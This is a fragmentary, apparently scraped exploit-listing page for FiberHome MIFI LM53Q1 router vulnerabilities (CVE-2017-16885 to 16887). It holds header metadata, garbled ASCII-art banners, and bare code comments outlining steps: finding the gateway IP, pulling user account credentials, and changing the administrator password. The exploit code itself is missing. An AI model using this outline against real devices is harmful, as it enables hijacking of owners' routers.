| $$ | $$| $$ | $$| $$_/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$/ | $$ \ $$| $$__/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$

| $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/

|/ |/|_/ _______/|/ |/ |/ ______/ |/ |/ |/ _______/ |/ |/ _______/|/ |/ |/ ______/ _/ ___/ |______/|/ _/| $$_/ |/ ______/ |/ ___/

| $$

| $$

|__/

Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities

Exploit Author: Ibad Shah

Vendor Homepage: www.fiberhome.com

Version: VH519R05C01S38

Tested on: Linux

Platform : Hardware

CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887

Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC

Declaring IP as our global variable to probe for Gateway IP of Device

Getting Gateway IP Address

Function to get Device Statistics

Function for getting User Account Details to login to Portal

Function to change Administrator Password

Tags

Sightings

Nomenclature

| $$ | $$| $$ | $$| $$**_/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$*/ | $$ \ $$| $$***/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$___/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$

|/ |/|_/ _/|/ |/ |/ / |/ |/ |/ _/ |/ |/ _/|/ |/ |/ __/ _/ _/ |____/|/ _/| $$_/ |/ ____/ |/ _/